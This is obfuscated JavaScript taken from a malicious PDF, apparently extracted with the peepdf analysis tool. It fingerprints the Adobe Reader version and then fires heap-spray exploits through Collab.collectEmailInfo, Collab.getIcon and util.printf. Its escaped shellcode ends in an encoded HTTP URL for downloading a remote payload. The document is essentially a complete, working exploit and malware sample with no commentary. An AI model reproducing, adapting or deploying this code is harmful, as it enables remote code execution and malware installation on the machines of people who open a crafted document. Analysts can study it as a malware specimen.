// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%u', '4343%', 'u4343%u', '0FEB%', 'u335B%', 'u66C9%u8', '0B9%u8', '001%uE', 'F33%uE', '243%uE', 'BFA%uE80', '5%uFFEC', '%uFFFF', '%u8B7F%', 'uDF4E', '%uEFEF%u', '64EF%', 'uE3AF%u', '9F64%u42', 'F3%u9F', '64%u6E', 'E7%uEF0', '3%uEFEB%', 'u64EF%uB', '903%u61', '87%uE1A1', '%u0703%', 'uEF11', '%uEFEF%', 'uAA66%uB', '9EB%u', '7787%', 'u6511%', 'u07E1%uE', 'F1F%uEF', 'EF%uA', 'A66%uB', '9E7%uCA', '87%u10', '5F%u07', '2D%uEF', '0D%uE', 'FEF%uAA', '66%uB9', 'E3%u0087', '%u0F2', '1%u078F%', 'uEF3B%u', 'EFEF%uAA', '66%uB9FF', '%u2E87%', 'u0A96', '%u0757%', 'uEF29', '%uEFEF%', 'uAA66%u', 'AFFB%uD', '76F%u9', 'A2C%u661', '5%uF7A', 'A%uE80', '6%uEFEE', '%uB1E', 'F%u9A66', '%u64CB', '%uEBAA', '%uEE85%u', '64B6%uF7', 'BA%u07', 'B9%uE', 'F64%uEF', 'EF%u87', 'BF%uF', '5D9%u9F', 'C0%u7807', '%uEFEF%u', '66EF%u', 'F3AA%u2A', '64%u2', 'F6C%u6', '6BF%uCF', 'AA%u1', '087%uEFE', 'F%uBFE', 'F%uAA6', '4%u85FB', '%uB6E', 'D%uBA', '64%u07', 'F7%uEF8E', '%uEFE', 'F%uAA', 'EC%u2', '8CF%u', 'B3EF%uC', '191%u', '288A%u', 'EBAF%', 'u8A97%', 'uEFEF', '%u9A10%', 'u64CF', '%uE3AA', '%uEE8', '5%u64B', '6%uF7', 'BA%uAF0', '7%uEFE', 'F%u85EF%', 'uB7E8%', 'uAAEC', '%uDCCB', '%uBC34', '%u10BC', '%uCF9A%u', 'BCBF%', 'uAA64', '%u85F', '3%uB6EA%', 'uBA64%', 'u07F7%u', 'EFCC%uEF', 'EF%uEF85', '%u9A10', '%u64CF%u', 'E7AA%uED', '85%u64B6', '%uF7BA%', 'uFF07%uE', 'FEF%u', '85EF%u', '6410%uF', 'FAA%uEE8', '5%u64B6%', 'uF7BA%', 'uEF07%uE', 'FEF%uAEE', 'F%uBDB4%', 'u0EEC%u0', 'EEC%u', '0EEC%u0', 'EEC%u03', '6C%uB', '5EB%u64B', 'C%u0D35%', 'uBD18', '%u0F10%', 'u64BA%u6', '403%uE', '792%u', 'B264%uB9', 'E3%u9C', '64%u64D', '3%uF19B', '%uEC97%', 'uB91C%', 'u9964', '%uECCF', '%uDC1', 'C%uA6', '26%u42AE', '%u2CEC', '%uDCB9', '%uE019', '%uFF51%u', '1DD5%uE', '79B%u212', 'E%uEC', 'E2%uA', 'F1D%u', '1E04%u', '11D4%', 'u9AB1%u', 'B50A%u', '0464%u', 'B564%u', 'ECCB%', 'u8932', '%uE364%u', '64A4%u', 'F3B5%u', '32EC%uEB', '64%uEC64', '%uB12', 'A%u2DB2', '%uEFE7%u', '1B07%u10', '11%uB', 'A10%uA3B', 'D%uA0A2', '%uEFA1%u', '7468%u', '7074%u2', 'F3A%u', '732F%u6F', '74%u7472', '%u6F66%u', '6472%', 'u6961%u', '6372%u6', '461%u74', '65%u2', 'E73%u726', 'F%u2E', '67%u6', 'B75%u662', 'F%u61', '6C%u68', '73%u65', '2F%u65', '78%u7', '02E%u', '7068%', 'u783F%u7', '03D%u66', '64');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

